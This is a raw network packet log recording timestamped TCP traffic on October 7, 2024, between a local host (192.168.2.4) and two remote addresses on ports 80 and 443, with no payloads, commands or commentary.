                                                                                                                                      Oct 7, 2024 03:23:09.591964960 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.591995955 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.594552994 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.594599962 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.594609022 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.594619036 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.594628096 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.594628096 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.594646931 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.594655037 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.597327948 CEST4434981313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.597414970 CEST4434981313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.597461939 CEST49813443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.597603083 CEST49813443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.597621918 CEST4434981313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.597636938 CEST49813443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.597645044 CEST4434981313.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.599153042 CEST4434981213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.599205017 CEST4434981213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.599251986 CEST49812443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.599348068 CEST49812443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.599363089 CEST4434981213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.599374056 CEST49812443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.599378109 CEST4434981213.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.600573063 CEST49816443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.600651979 CEST4434981613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.600725889 CEST49816443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.600841999 CEST49816443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.600861073 CEST4434981613.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.601290941 CEST49817443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.601353884 CEST4434981713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.601423025 CEST49817443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.601505995 CEST49817443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.601524115 CEST4434981713.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.610253096 CEST4434981113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.610404968 CEST4434981113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.610467911 CEST49811443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.610513926 CEST49811443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.610533953 CEST4434981113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.610547066 CEST49811443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.610553980 CEST4434981113.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.613064051 CEST49818443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.613086939 CEST4434981813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.613174915 CEST49818443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.613347054 CEST49818443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.613368034 CEST4434981813.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.616699934 CEST4434981413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.616767883 CEST4434981413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.616818905 CEST49814443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.616977930 CEST49814443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.616991043 CEST4434981413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.617002964 CEST49814443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.617011070 CEST4434981413.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.619297981 CEST49819443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.619328976 CEST4434981913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.619467020 CEST49819443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.619594097 CEST49819443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.619622946 CEST4434981913.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.722331047 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.722368956 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.722409010 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.722419024 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.722438097 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.722461939 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.722465992 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.722500086 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.722508907 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.722531080 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.722542048 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.722563982 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.722585917 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.722594976 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.722599983 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.722626925 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.722645998 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.722672939 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.722774029 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.722822905 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.722822905 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.722871065 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.722876072 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.722903967 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.722918987 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.722934961 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.722951889 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.722978115 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.723227978 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.723261118 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.723270893 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.723308086 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.723309994 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.723356009 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.723357916 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.723397970 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.723412037 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.723443985 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.723459959 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.723490953 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.723581076 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.723613977 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.723632097 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.723645926 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.723655939 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.723678112 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.723681927 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.723711014 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.723716974 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.723742008 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.723751068 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.723774910 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.723782063 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.723817110 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.723925114 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.723975897 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.723977089 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.724023104 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.724090099 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.724137068 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.724225044 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.724262953 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.724277020 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.724304914 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.724311113 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.724340916 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.724358082 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.724373102 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.724381924 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.724405050 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.724414110 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.724436998 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.724452019 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.724467039 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.724484921 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.724499941 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.724508047 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.724531889 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.724541903 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.724562883 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.724571943 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.724605083 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.724891901 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.724941969 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.724946022 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.724986076 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.724989891 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.725023985 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.725040913 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.725055933 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.725064993 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.725087881 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.725095987 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.725119114 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.725133896 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.725163937 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.733542919 CEST4434981513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.734076977 CEST49815443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.734093904 CEST4434981513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.734673023 CEST49815443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.734679937 CEST4434981513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.833602905 CEST4434981513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.833748102 CEST4434981513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.833802938 CEST49815443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.833945036 CEST49815443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.833950043 CEST4434981513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.833959103 CEST49815443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.833962917 CEST4434981513.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.836436033 CEST49820443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.836510897 CEST4434982013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.836592913 CEST49820443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.836734056 CEST49820443192.168.2.413.107.246.45
                                                                                                                                      Oct 7, 2024 03:23:09.836772919 CEST4434982013.107.246.45192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.854909897 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.854945898 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.854968071 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.855093002 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.855317116 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.855369091 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.855369091 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.855415106 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.855432987 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.855467081 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.855499983 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.855516911 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.855535030 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.855556011 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.855566025 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.855598927 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.855607986 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.855632067 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.855638027 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.855664015 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.855675936 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.855698109 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.855703115 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.855727911 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.855736971 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.855761051 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.855771065 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.855842113 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.855859041 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.855882883 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.855892897 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.855940104 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.855978012 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856009960 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856028080 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856041908 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856050014 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856076002 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856080055 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856106997 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856120110 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856139898 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856144905 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856169939 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856182098 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856203079 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856209040 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856232882 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856250048 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856265068 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856276035 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856296062 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856306076 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856328964 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856336117 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856359005 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856375933 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856390953 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856400967 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856435061 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856440067 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856470108 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856492043 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856503963 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856518984 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856549025 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856558084 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856580019 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856587887 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856611967 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856620073 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856647015 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856651068 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856678009 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856695890 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856709003 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856719971 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856739998 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856750011 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856786966 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.856787920 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.856834888 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.857079983 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.857110977 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.857131958 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.857142925 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.857157946 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.857175112 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.857191086 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.857215881 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.857223034 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.857254028 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.857263088 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.857285976 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.857297897 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.857316971 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.857332945 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.857348919 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.857362032 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.857379913 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.857395887 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.857412100 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.857425928 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.857443094 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.857458115 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.857475042 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.857490063 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.857506990 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.857515097 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.857538939 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.857556105 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.857570887 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.857580900 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.857614994 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.859821081 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.859853029 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.859879017 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.859885931 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.859894991 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.859918118 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.859925032 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.859956026 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.859966993 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.859997988 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.860007048 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.860035896 CEST4981080192.168.2.4185.215.113.103
                                                                                                                                      Oct 7, 2024 03:23:09.860045910 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.860078096 CEST8049810185.215.113.103192.168.2.4
                                                                                                                                      Oct 7, 2024 03:23:09.860088110 CEST4981080192.168.2.4185.215.113.103
